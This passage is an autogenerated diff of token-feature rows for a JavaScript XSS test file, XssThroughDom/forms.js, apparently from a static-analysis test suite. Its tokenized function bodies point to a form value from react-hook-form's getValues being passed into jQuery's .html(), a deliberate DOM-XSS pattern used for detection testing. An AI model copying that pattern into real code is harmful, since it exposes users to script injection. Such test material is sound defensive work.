+| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:24 | name="name" | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:24 | name="name" | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:24 | name="name" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:24 | name="name" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:88:19:88:24 | "name" | assignedToPropName | name | +| autogenerated/Xss/XssThroughDom/forms.js:88:19:88:24 | "name" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:88:19:88:24 | "name" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:88:19:88:24 | "name" | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:88:19:88:24 | "name" | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:88:19:88:24 | "name" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:28 | ref | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:28 | ref | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:28 | ref | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:28 | ref | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:28 | ref | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:39 | ref={register} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:39 | ref={register} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:39 | ref={register} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:39 | ref={register} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:39 | ref={register} | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:39 | ref={register} | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:39 | ref={register} | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:39 | ref={register} | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:39 | ref={register} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:88:26:88:39 | ref={register} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:88:31:88:38 | register | assignedToPropName | ref | +| autogenerated/Xss/XssThroughDom/forms.js:88:31:88:38 | register | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:88:31:88:38 | register | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:88:31:88:38 | register | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:88:31:88:38 | register | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:88:31:88:38 | register | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:88:43:89:6 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:88:43:89:6 | \\n | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:88:43:89:6 | \\n | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:88:43:89:6 | \\n | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:88:43:89:6 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:89:7:96:15 |